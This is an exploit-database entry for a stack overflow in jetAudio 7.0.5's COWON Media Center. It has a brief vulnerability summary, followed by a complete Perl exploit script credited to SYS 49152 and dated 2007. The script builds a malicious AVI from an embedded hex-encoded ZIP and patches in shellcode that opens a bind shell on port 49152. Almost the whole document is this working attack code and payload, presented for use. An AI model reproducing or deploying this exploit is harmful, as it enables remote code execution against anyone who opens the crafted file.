header-logo
Suggest Exploit
vendor:
jetAudio
by:
SYS 49152
7.5
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: jetAudio
Affected Version From: jetAudio 7.0.5
Affected Version To: jetAudio 7.0.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 ENG

jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow

This exploit allows an attacker to execute arbitrary code on a system running jetAudio 7.0.5 COWON Media Center MP4. The vulnerability is caused by a stack overflow in the AVI file parser of the media player. By crafting a malicious AVI file and playing it with COWON Media Center, an attacker can trigger the stack overflow and execute arbitrary code with the privileges of the user running the media player. This exploit has been tested on Windows XP SP2 ENG and provides a shell on port 49152.

Mitigation:

Update to a patched version of jetAudio. Currently, no patch is available.
Source

Exploit-DB raw data:

#!/bin/perl
#
# jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow
# 
# 0-day discovered and exploited by SYS 49152
# 
# Tested on win XP SP2 ENG
# Shell on port 49152
# 
# usage:
# - download the latest 3ivx codec from here:
#   hxxp://www.3ivx.com/codec/3ivx_MPEG-4_501_trial_win.exe
# 
# - play the AVI file with COWON Media Center 
# 
# Maybe I will add more vulnerable apps if I have time.
# SYS 49152
# 
# gforce(put the @ here)operamail(put the . here)com

use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); 

# begin binary data:
$bin_data = # 3289
"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xDA\x6C\x91\x37\x9C".
"\x4D\x90\x80\x69\x0C\x00\x00\x5C\xC2\x01\x00\x07\x00\x00\x00".
"\x6A\x65\x74\x2E\x61\x76\x69\xED\xD7\x7B\x58\xD4\x55\x1A\x07".
"\xF0\x77\x06\xF0\x82\x97\x47\x4D\xC1\xAC\xA5\x31\xB4\x2C\x03".
"\x61\x00\x05\xB3\x44\x64\xC0\x4C\xC4\x2B\x78\x41\x6C\x60\x46".
"\x19\x61\xB8\xCC\x0C\x20\xA6\x84\x62\x5E\xC9\xAD\xD0\xD2\x92".
"\x15\x4D\x4B\xCB\xA7\x52\x2B\xCD\xB6\xD4\xA7\xCC\x28\xA3\xEC".
"\xAA\x95\xB6\xD9\x45\x58\xDA\x52\x22\xCD\x5B\xED\xFB\xCE\x39".
"\x23\xB8\x3D\x7B\x79\x9E\xDD\x67\xFF\xFA\x7E\xEA\xF5\x9C\xF9".
"\xCD\xEF\x77\x2E\xEF\x39\xBF\x33\x4A\x44\xA6\x59\x9E\xB2\xC2".
"\x94\xE8\x11\x26\x62\x52\x3A\x0B\xA3\xCD\x0E\x77\x81\x53\x3E".
"\x93\xA1\x2E\xD8\x59\x50\x50\xC2\xB5\x3C\x67\x49\x8E\x4D\x2E".
"\xED\x4B\xFB\xC3\xF9\x03\x39\xD3\xBE\x23\x32\x4E\x21\xBA\x79".
"\x11\x19\x48\xFE\x6F\x75\xD5\x87\xDF\x7F\x8E\xA7\x7F\xC9\x48".
"\xD4\xA5\xD6\xE3\xB2\xE6\x72\x3D\xC3\x93\xEB\xED\xB3\xBD\xF4".
"\xB9\x2F\x2D\x44\x5A\xD2\xAD\x71\xBF\x6D\x18\xAE\xFC\xF1\x8F".
"\x17\x5B\xC5\x5F\xF5\xA9\xCB\x30\xA7\xCD\x61\xE5\x8A\xC9\x69".
"\x6B\x9D\x97\xEA\x63\x7B\x22\x75\x9A\x42\x93\xDF\xF0\xDE\xD8".
"\x37\xC7\x96\xE7\xF2\x3D\xE5\x2E\x28\xCE\xA7\xAB\x75\xFE\xC9".
"\xE9\xC8\x9F\xC5\x95\x6E\x6E\xA7\x6A\x48\xEB\x67\x53\xD7\xAF".
"\xB7\xB9\xEC\xB3\xF4\x35\x19\x52\xE7\x62\x57\x9E\x49\xD5\x3B".
"\xEF\x76\x7B\xB2\xF2\xB8\x3E\xDB\xED\x71\xFB\x9E\x95\x7B\xD2".
"\x79\x11\xAC\x6D\x3E\x2B\x46\xEA\x26\x05\x0F\x4F\x44\xD9\xDD".
"\x36\xB7\x54\xFC\x2A\x2A\x2A\x6E\xE4\xD2\x9F\xCB\x9E\xF1\xBD".
"\xC8\x18\x44\xC6\x61\x5B\xC9\xD0\xFC\x4E\x00\x5F\x31\xF6\xE8".
"\xD6\x8E\x0B\x03\xE7\x95\x7A\xBB\x3D\x1E\x77\x6B\xB3\xC6\x4F".
"\xF8\x21\xA9\x0F\xE0\xEE\xB3\xAF\x74\xA2\xBA\xEC\xA5\xCB\x50".
"\x8E\xCE\xAA\xDE\x29\x8F\xEF\x9B\x47\x57\xC8\xF3\xD4\xFE\xFF".
"\x14\xEF\xF2\x10\x2E\x71\xFC\xC4\x21\xF5\x5D\x1C\x1F\x71\x6C".
"\xE7\xA8\xE0\xE0\x35\x32\x2C\xD1\xDF\x6D\xE6\x78\x8A\x63\x07".
"\xC7\xE3\xFA\xDE\xB5\x1C\xBC\x67\x0D\x3C\x7E\xC3\x06\x8E\x2A".
"\x8E\xA7\x39\x38\xCD\x86\xF9\x1C\xEF\xE9\xCF\x7F\xE4\x58\xAF".
"\xE3\x63\x8E\x2F\x39\x16\x70\xBC\xCA\x91\xC1\x91\xC5\xB1\x5B".
"\xF7\xC9\xCB\x6A\x48\xE1\x78\x94\x83\xDF\x11\xC3\x21\x5D\x5F".
"\xAC\xEB\x0F\x72\x3C\xC7\xF1\x08\x07\xE7\xD7\xB0\x8A\xA3\x90".
"\x63\x94\xEA\xDF\x18\xC8\x65\x19\xC7\x44\x8E\x34\xDD\x56\x14".
"\xC7\x72\x0E\x87\xBE\xB7\x98\xC3\xC3\x91\xC4\x71\x40\xDF\x7F".
"\x9C\xE3\x1B\x7D\x7D\x0C\xC7\x6C\x1D\x2E\x5D\xCE\x6B\x53\xDA".
"\x74\x3B\x32\xEE\xFB\x38\xEC\xFA\x3E\x99\xFF\x43\x3A\x16\x72".
"\x3C\xC6\xB1\x93\xE3\x7E\x1D\x72\x5D\xC6\xBD\x9A\x54\x2E\xD7".
"\xEA\xFA\x33\xFA\x5E\xC9\xC7\xD7\x1C\x17\x48\xCD\xF1\x61\x52".
"\xF3\xE3\x73\xC3\x9B\x17\x5F\xAE\x64\x9C\x8B\xF4\xB3\x2F\xE8".
"\xF2\x45\x8E\xEF\x39\x4E\x70\xAC\x21\x35\xBE\x39\xD4\xBA\x96".
"\x6F\x72\xEC\x25\x95\x7F\x19\xAB\xAC\xD1\xEB\x1C\xF7\xE8\xF6".
"\xF9\x1D\xF4\xE6\x5B\xD6\x56\xF2\x54\x4A\x6A\xED\xA5\xED\x7B".
"\x39\xAA\x49\xE5\xE9\x0B\x8E\xBF\x92\x5A\x4B\xC9\xA9\x8C\x43".
"\xD6\x77\x2E\xC7\x36\x8E\xA5\xFA\x7E\x99\xAB\xCC\x21\x87\xD4".
"\x38\xEC\xFA\x79\xC9\xFD\x3C\xDD\x47\xDB\x79\xF1\xD9\x64\x58".
"\xC6\x51\xCB\xB1\x55\x97\xF2\x5C\xB9\xBE\x3F\x5F\x7F\x96\xFB".
"\x65\x6C\x45\xBA\xCD\x3A\x8E\xCF\x49\x8D\x63\xA1\xEE\x9F\xDF".
"\x47\x6F\xBE\x57\x90\xCA\x97\xB4\x2D\x6B\xE6\xD2\xED\x48\x3E".
"\x64\xDD\x66\xEB\xE7\x64\x6F\xC9\x5C\x65\x6F\x7F\x40\x6A\x2F".
"\xCB\xF5\x55\xFA\xBE\xFB\xF4\x33\xB2\x37\x64\xDE\x0B\x74\xFB".
"\xF3\x75\xBB\xF2\x7D\x3D\xA9\x77\x41\xD6\xC0\xA9\xFB\x92\xFB".
"\x65\x8C\x32\x66\xB7\xEE\x5B\xFA\x9C\xAE\xAF\xF3\xB3\x7C\xB0".
"\xA8\xF5\x92\x79\xCA\xFC\x72\xDA\xDC\x3B\x5D\xDF\x2F\x39\x93".
"\x9C\x4A\x1E\x7C\x63\x9D\xAF\xEB\xCB\xF5\x67\x59\xE7\x3D\x1C".
"\x9B\x48\x8D\x51\xDA\x94\xB9\xC8\x78\x66\xE8\x67\xFF\x46\x6A".
"\x1D\xA5\x2E\xEB\x25\x7B\xA5\x80\xD4\x7B\x24\xE3\x29\xD2\xFD".
"\xF8\xE6\x27\xB9\x7C\x5C\xF7\x25\x73\x91\x1C\xC8\x1E\xFA\x5A".
"\xDF\x2B\x21\x6B\xF1\x29\xA9\xFD\x2C\x7B\x45\x72\x26\x7B\x44".
"\xF6\x6E\x96\xEE\x47\xE6\x94\xDB\xE6\x99\x32\xDD\x5F\xAE\xBE".
"\x5F\xEE\x95\xF7\xE4\x49\x8E\x07\x48\xED\x9D\x23\xA4\xE6\x23".
"\x63\x90\x33\xE4\x15\x52\xEF\x88\xEC\xB1\x4A\x8E\x93\xA4\xE6".
"\xCA\x47\xBD\x37\xD7\x32\x0F\x99\x97\xBC\x53\xB2\x1E\x35\xA4".
"\x72\x20\xE3\x93\xB1\x1F\xD4\xED\x1C\x25\xB5\xB6\x92\x6F\x99".
"\xA3\xAC\xB5\xEC\x3B\x19\x97\xEF\x7D\x3E\x4C\x2A\xFF\xF2\xEC".
"\x6C\x7D\x5D\x4A\x59\x57\x99\x8F\xAC\xB9\x8C\x5D\xDE\xB1\x1C".
"\xDD\x77\x81\xFE\xEC\x5B\xEB\xA9\xA4\xD6\x47\xDA\x90\x31\x96".
"\xE9\xBA\xEC\x6D\x19\xBF\x9C\x63\x0F\xEB\x76\x5E\xE2\x18\x47".
"\x6A\xEE\xD2\xB6\xE4\x71\x04\xA9\xF1\x8E\x25\xB5\xC6\xC3\x49".
"\xE5\x6A\x87\xBE\x16\x47\xEA\x1D\x91\x73\xF8\x0E\x8E\x3B\x39".
"\x9E\xE7\x88\xD5\xED\xCB\xFC\x27\x93\x5A\x17\x99\x13\xFF\xBD".
"\xC2\x9B\xCB\x4C\x7D\xBF\xAC\xBD\xBC\x83\x32\xB7\xC1\xA4\xF6".
"\x8C\x94\x92\x8F\x16\x52\xEB\x2C\xE7\xA3\xE4\x21\x9E\x63\x1A".
"\xC7\x8D\xA4\xC6\x26\xF9\x1C\xA0\xFB\x97\x79\x48\x3E\xE5\x8C".
"\x95\xFD\x21\xE7\x9B\xE4\x72\x8E\x7E\x56\xEA\x92\x33\xC9\xCD".
"\x4C\x7D\x5D\x72\x21\x39\x97\x75\x93\xBD\x55\xA5\xCB\xFE\xA4".
"\xD6\x58\xEA\xEF\x93\xCA\xC5\x0F\xA4\xCE\x7D\x69\x47\xF2\x29".
"\xE7\x98\xE4\x61\x0B\xA9\x33\x4C\xEE\x29\xD5\x6D\xFA\xD6\xF5".
"\x2B\x52\x39\x97\x3D\x26\xE7\x9B\xEF\xCC\x90\x31\xC8\x1A\xCA".
"\x79\x65\x21\x75\xDE\x39\xF5\x73\xF2\xFD\x42\x7D\xED\x01\xDD".
"\x97\x44\x3F\xFE\x9D\xBC\xC8\x25\xFF\x66\x7B\x73\x20\x39\x32".
"\x73\x04\x73\x74\xD0\x63\xB0\xEB\xE7\x64\xEC\x32\xCE\xB7\xF8".
"\xBD\xE6\xDF\x76\x6F\xFE\x64\xDF\xC8\x39\x24\x7B\x4A\xDE\x53".
"\x59\x4B\xC9\x93\xE4\x44\x72\x57\xA0\xFB\x5B\xA4\x3F\xCB\xF8".
"\x25\xAF\xF2\x1E\x4E\xD5\x6D\xE7\xE8\x52\xC6\xE7\x3B\x53\x7C".
"\x67\xD2\x52\x5D\x97\xB5\x9C\xA6\xEF\xF5\xED\x35\xC9\x75\x2A".
"\xA9\xBC\x4B\x1E\xB2\x74\x5D\xBE\x1F\xAB\x3F\xFB\xCE\x51\x39".
"\x63\x24\x97\x4E\xDD\x46\xA5\x6E\x53\xD6\x50\x7E\x8F\x6E\xE0".
"\x48\xD0\xED\xC9\x6F\xAA\x1F\xA9\x39\xC8\x7E\xFE\x91\x54\x7E".
"\x24\xCF\x72\x76\x64\xE8\xF6\x64\x6F\xCB\xD9\xF3\x19\xA9\xDF".
"\xA7\x51\xBA\x8D\xD1\xA4\xE6\x27\xEF\xC9\x7C\xFD\x9C\xEF\xEC".
"\x59\xA5\xAF\xCB\xFE\xF0\x9D\xDF\x32\x0F\xC9\xCD\x4A\x52\xE3".
"\x2A\xD6\xDF\x49\x5F\x32\x1F\xC9\x83\xE4\xEF\x3E\xFD\x5C\xAE".
"\x6E\x6B\x11\xB5\xBE\xBB\x72\xC6\xC9\xFB\xEE\x3B\x67\x65\xEC".
"\xB2\x1E\xEB\xF4\x73\x95\xFA\x9A\x9C\x3D\xF2\xEE\xC8\xDA\xCB".
"\x79\x22\xEF\x83\xE4\x60\x95\xEE\xC7\xB7\x77\x65\x2F\xC9\xFE".
"\x75\xE8\x48\x27\x35\x1E\xA7\x8E\x7B\xA9\xF5\x5C\x92\x76\x67".
"\xE9\xBA\xF4\x25\x6B\x51\xAA\x9F\x91\x35\x96\xF1\xFA\x7E\x27".
"\x9C\xD4\x7A\x26\x4B\xEE\x16\xE9\xCF\xB3\xF5\x3D\x4E\xBA\x7A".
"\x2F\xCC\xD5\xFD\xCB\x7D\xBE\xB9\x4B\x4E\x17\xE8\xFE\x65\xBC".
"\xFC\x7E\x91\xAC\xA1\x8C\x49\x7E\x53\x8A\xF5\x73\xFA\x2C\xA3".
"\xB3\xA4\xF2\x29\xFB\x57\xF6\xB3\x9C\x9B\xB2\x97\x1E\xD1\xCF".
"\xF8\xDE\x5F\x69\x5B\xC6\xE2\x7B\xBF\x25\x67\x92\xDF\x25\xD4".
"\x3A\x47\x79\x0F\x24\x77\xBE\xB5\x5D\xAE\xC7\xE1\xD6\x7D\xC8".
"\x38\x17\x52\xEB\x19\xF5\x98\x7E\x5E\xD6\x46\xCE\xFF\x05\x3A".
"\x2A\x74\x3B\xBE\xDF\x73\xAB\x6E\x2F\x87\x5A\x7F\x1F\xCB\x74".
"\xBF\x19\xBA\x2E\x39\xCA\xD3\xED\xCB\x67\xC9\x95\xE4\xB9\x5C".
"\x7D\xA6\xF5\x6E\x4F\x36\x8F\xDF\x2B\x94\xFF\xEA\x30\x9C\xE3".
"\x03\xFE\xEB\x54\x3C\x19\xDB\x75\x21\x63\xFF\xF3\x64\x4C\x3C".
"\x41\x46\x7B\x26\x19\x97\x2E\x23\xE3\xD6\x51\x64\x7C\xCB\x48".
"\xC6\x53\xA7\xC9\xAF\xFD\x46\xF2\xBB\xF9\x04\xF9\x25\xAF\x24".
"\xBF\x9C\x61\xE4\xB7\x6C\x2D\xF9\x3D\x3D\x86\xFC\xDE\x7E\x8A".
"\xFC\x1A\x6F\x23\xFF\xF6\xE7\xC9\xFF\xA6\x5F\xC8\x3F\xF1\x75".
"\xF2\xB7\x77\x20\xFF\xC5\xDD\xC8\x7F\xE3\x64\xF2\xDF\x9F\x4F".
"\xFE\xC7\x9B\xC9\xFF\xD2\x28\x0A\xE8\xD3\x40\x01\x43\x23\x29".
"\x60\xCA\x29\x0A\x28\xD9\x49\x01\xAB\xAB\x28\x60\x57\x1A\x05".
"\x7C\xF0\x25\xFF\xBC\xF9\x15\xDB\x3C\x56\x3E\x76\x2F\x3A\xED".
"\x5C\x2A\x57\xFD\x3B\x89\xFF\x6D\xE5\xB2\x16\x16\xE6\xD1\x15".
"\x86\x5D\x8D\x0E\xFE\xE7\x03\xFF\x26\xEC\xDD\x96\x6F\x75\x72".
"\xB9\xD3\x66\xF5\x3E\x6C\x90\xAF\x53\x4B\xEC\x2E\x4F\xB1\xCB".
"\x6E\xCA\x2A\x33\x4D\x9C\x3A\xD1\x14\x1D\x17\x19\x63\x36\xCD".
"\x2A\x70\x99\xE6\xD8\x3D\x23\x8A\x6D\x8E\x02\xD3\xC8\xD4\xF4".
"\xD4\xB1\xA6\x14\x3B\xFF\xB3\xCD\x34\xD2\x9E\xEF\xB1\xBB\x4C".
"\x5E\xFE\x49\xF1\xFC\x5F\x45\x27\x55\x34\x5B\xFE\x7B\xF1\x96".
"\x71\x96\xE9\x96\xF8\x91\x1D\xCE\x7B\x96\x35\x0D\xAC\xAB\x6C".
"\x7C\xFE\xD8\x0F\xC7\x3C\xFD\x5A\xA6\x2F\x74\x5F\xF3\xE6\xB4".
"\xF5\x1B\x2B\x9B\x2E\x9D\x6C\x19\x1A\x51\xFA\x7D\xF8\x13\xD9".
"\x99\x71\x43\x83\xDF\x3D\x59\x1E\xFC\xCD\x85\x23\x7F\xD9\xFC".
"\xDA\x74\xF7\xAD\xCB\x13\x82\x7F\xFD\x6E\x7A\x69\x43\x4A\x7E".
"\x70\xED\x80\xDC\x8C\xD8\x39\x6B\x4B\x27\x5F\xEE\xBA\x67\xF9".
"\xAE\x7D\xC1\xBF\x9E\x9C\x5E\x7A\x28\x25\xED\xD3\x5B\xD7\x25".
"\xD5\x8C\x3E\x58\x12\x3C\xE0\xE9\xF2\x8A\xFD\x01\xB9\xC9\x07".
"\x53\xAE\xDD\x7E\xEB\x92\xB4\xE0\x23\x9F\x9D\x0B\xFE\xAA\xDE".
"\xBF\x65\xD0\xB2\x49\x85\x67\xE2\xAA\x2E\x34\xD7\x9A\x9F\xAB".
"\x7E\x36\xEC\xC7\xEA\x75\x5D\xB3\x8B\x9E\x7D\xA8\x68\xC6\xE5".
"\xC0\xEC\xD2\x75\x27\x32\x3E\x3E\xF0\x78\xDA\xF6\x43\x1F\x96".
"\x1D\x4A\xDE\xBD\xFA\x89\xEA\x88\x3F\x65\x06\x99\x2D\x5B\xA3".
"\xCE\xBD\x93\xD9\xAD\xE3\x7B\xCD\x6B\x3A\x7E\xD9\x7C\x7F\xC7".
"\xEC\xA2\x5A\x73\xC6\xC6\xDA\x8E\xBD\xE2\x27\x9A\x63\x5F\x79".
"\xA9\x86\xBF\x8B\xA8\x3A\x5D\xBD\x65\x4C\x5D\xD6\xB9\x9D\xA3".
"\x1E\xDA\x32\xBA\x59\xEA\xA1\xD7\xF4\x69\xE0\xFA\x99\x87\xBB".
"\xD6\x65\x06\xD5\xB5\x24\xED\x5B\xFF\xED\xD9\xB8\x2A\xAE\x0F".
"\x3B\x7B\xB0\xD6\xFC\xDB\xE1\xD4\x7D\x67\xCF\x6C\x70\x8F\x1B".
"\xD0\x37\xE2\xE8\x80\x7E\xB9\x19\x13\xF2\x36\x9F\xA8\x8A\xED".
"\xFD\xBC\xF9\x6E\xD3\xE6\x40\xE7\x99\x96\x0F\x63\x1B\x57\x64".
"\xEE\x0A\xC9\x2E\xAD\xE9\x52\x7F\xFA\xD1\x4E\x67\x6B\x1F\xED".
"\x54\x77\x3A\x6E\x45\x4B\xE7\x1B\x66\x4E\x68\x8E\xAB\x3A\x9B".
"\x19\xE7\xCC\x2E\x4A\xE9\x72\xCF\x8D\xC6\x3B\xB3\x4B\x57\x73".
"\x7F\xB7\xAC\x9E\x7F\x60\xCD\x96\xD1\x99\x41\x9C\xC4\xEB\xFF".
"\xDD\x2A\xFC\x33\x23\x13\x2D\xAF\x15\x8D\xB2\x8C\xB7\x4C\xB1".
"\x04\x74\x35\x58\xC2\x0C\x06\x5E\xB0\x8A\x4A\xFE\x83\x8B\x0E".
"\xAA\x38\xAA\x8A\x78\x55\xAC\x50\x45\x85\x2A\x8A\x55\xE1\xAF".
"\x8A\x4E\xAA\x68\xB6\x8C\xE1\xA2\xD5\x44\x6E\x7F\xD6\xFE\x95".
"\x7A\x0F\x4C\xE5\xED\x10\x75\xF5\x3E\xD8\x6A\xF9\x79\x8F\x77".
"\x1F\x4C\x1A\x14\xF2\x73\xFC\x9F\x03\x93\xD3\xFB\x97\x7F\x54".
"\x65\x2D\xBF\xBC\xBA\x7E\xF9\xAB\xEF\x27\xF6\x89\x3A\x35\xA3".
"\xFC\xD4\xB2\xC4\x90\x33\xA1\x45\xE5\x2F\x27\x79\x62\xFA\xFA".
"\x1F\x88\x39\xFC\xDC\xE2\xE1\x2F\x6E\x5B\x1A\x32\xA6\xBA\xFB".
"\x91\x07\x8F\xD7\x96\x9F\xAA\x4A\x0C\x39\x11\x7A\xD7\x6B\x51".
"\xE7\xA6\xB6\x4C\x7C\xC6\x51\x1E\xF9\x86\xB5\xF1\x58\xAE\x27".
"\xFC\x8B\xD0\x76\x07\xA3\x1A\xEE\x2A\x7F\xEB\x85\x86\xF2\x5F".
"\x6A\xAF\xAB\x19\xFC\xDD\xDD\xD7\x36\xA4\x57\x57\x37\xD5\x87".
"\xBD\xB9\x62\xBF\x79\xC9\x8A\x73\xDD\x03\x73\xF6\xAF\xEA\x9D".
"\x58\xDD\x2B\x30\xFF\xDC\xE1\x6E\x27\x6E\xD9\x7A\x79\xEF\xE5".
"\x41\xE7\x92\xE7\x86\xDD\xB6\x63\x46\xC3\xA6\xE4\xF2\xA0\x27".
"\x9B\x2E\x06\xBD\xD4\xD4\x14\x14\x98\x53\x1F\x16\xB3\xA7\x3E".
"\x68\xFE\xD4\x3B\xC2\xC6\x6F\x3A\xBA\x88\xBF\x1B\xF4\x6D\xE3".
"\xE5\xBD\xFD\xDF\xEF\xDC\xF0\xF9\xF8\xDF\xF6\x86\x36\x49\x3D".
"\xA5\xB3\xFB\x0C\xD7\x1B\x2E\x75\xAF\x4D\x9E\xFB\x49\xCD\xCC".
"\x23\x95\x55\x3F\xA6\x57\x73\x3D\x74\xC3\x17\xF5\x61\x8F\x7C".
"\xDC\xB7\x76\x43\xC3\x99\xBC\xB8\xC8\xD4\x41\x3B\x22\x47\x7B".
"\x62\xEE\x36\xBE\xB2\x7B\x4D\x5A\xFB\x63\x03\xFB\x0F\x7F\xF7".
"\x1A\xBF\x1F\x6A\xDE\x4E\x3B\xFB\x75\xF2\x71\x43\x60\xFE\x4F".
"\x3D\x9E\x6A\x3C\xDF\x73\xC3\xCB\xE7\x7B\xD6\x36\xA6\xAF\xA9".
"\xE9\x55\x14\x7F\x7B\x53\x7A\xF5\x86\xE4\x74\x57\x60\x4E\x68".
"\x8F\x8E\xB7\xE7\xF5\x0D\xCC\xBF\xC0\xFD\x25\xAF\xEC\x75\xF4".
"\xE2\xDE\xD0\xE4\xB9\x9C\xC4\xE2\x75\xEB\xD6\x25\x01\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xFC\x0F\x59\x2C\x96\x48\x22\xBA\x69\xDB\x88\x09\x93\xB8\x0C".
"\xB1\x59\x3D\x56\x2E\x0D\x1C\x34\xCE\x31\x6F\x9E\x23\xDB\xEA".
"\x29\x30\x25\x39\x4A\xEC\x7C\xC1\xB4\xCD\x9A\x97\xC5\x65\xEF".
"\xB6\x77\xA5\x96\xD8\x5D\xB6\x02\xB7\x7C\xDF\x67\x76\xBE\x4B".
"\xCA\x1E\xFA\x7B\xA5\xAB\x3C\xE9\x71\xE5\xE6\xB7\x79\xD2\xC7".
"\x40\x5D\xBC\x65\x88\xCD\xE1\xCE\xE5\x32\xE8\x77\xDF\x4B\x1F".
"\xD7\x6F\xB3\x59\xCB\xB8\xEC\xD9\xB6\x5F\x73\x44\x44\x04\x17".
"\xD7\x66\x17\x3A\xF2\xB8\xEC\xAE\xBF\xEB\xE5\x7B\x34\x6E\x9B".
"\xA7\xA0\x80\xCB\xC8\xB6\x0F\x39\x26\x15\xE7\xDB\xDD\xA6\x92".
"\xE8\xF0\x21\xE1\x91\xE1\x51\x11\xB7\x99\xC6\x17\x3B\xB2\x73".
"\x27\x39\x9C\x76\xD3\xE0\xF0\x98\x70\x33\xDF\xB3\x29\x8C\x49".
"\xAF\x4E\xBB\x55\xC6\x4C\xD9\x05\xCE\x70\x6B\x61\x61\x9E\x3D".
"\x5C\x3D\x2E\x23\xC9\xB7\x3A\xED\xBE\x06\xC7\xA6\x4E\x48\xE1".
"\xEA\x9C\xB6\x1D\x99\x22\xBC\x86\x44\x5F\x5D\x89\x1C\x1C\x11".
"\xA5\xAE\xC4\x59\x22\x54\x25\x36\x5A\xDF\x33\x24\xC2\xEC\xAD".
"\x44\xC5\x24\x24\xA9\x4A\xE4\x10\x75\x4F\xA4\x39\x2A\x51\x57".
"\x62\xA2\xB9\xF1\xB2\xFF\x60\x84\xD7\xB5\x1D\xA1\xDD\x3D\x73".
"\x64\x62\x62\xC2\xCC\xBB\x12\xE5\xAB\xA1\x6D\x07\x1A\x19\x35".
"\x30\xC9\x92\x38\x38\x76\x88\x39\xC9\x92\x10\x93\x60\x4E\x4A".
"\x88\x4E\x88\x1D\x11\x1D\x39\x38\x3A\xD6\x62\x8E\x88\x4E\x1A".
"\x3C\x22\x61\x60\x5C\x44\x6C\xAC\x99\x3B\x6E\xF7\xED\x2C\x97".
"\x9D\x1B\xFD\x3B\x50\x4B\x01\x02\x14\x0B\x14\x00\x00\x00\x08".
"\x00\xDA\x6C\x91\x37\x9C\x4D\x90\x80\x69\x0C\x00\x00\x5C\xC2".
"\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00".
"\x00\x00\x00\x00\x00\x6A\x65\x74\x2E\x61\x76\x69\x50\x4B\x05".
"\x06\x00\x00\x00\x00\x01\x00\x01\x00\x35\x00\x00\x00\x8E\x0C".
"\x00\x00\x00\x00";
# end binary data. size = 3289 bytes

my $shellcode = # code jet
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";
# end binary data. size = 344 bytes

open(code, ">jet.zip") || die "Can't Write temporary File\n";
binmode (code);
print code $bin_data;
close (code);
print "\nTemporary file ready, patching..\n";
my $zip = Archive::Zip->new();
$zip->read( 'jet.zip' ) ;
$zip->extractMember( 'jet.avi' );
open(code, "+<jet.avi") || die "Can't Open temporary File\n";
binmode (code);
seek code,4395,0;
print code $shellcode;
close (code);
print "Shellcode added, have fun!\n";

# milw0rm.com [2007-12-18]

Navigation

Suggest Exploit

Services By CQR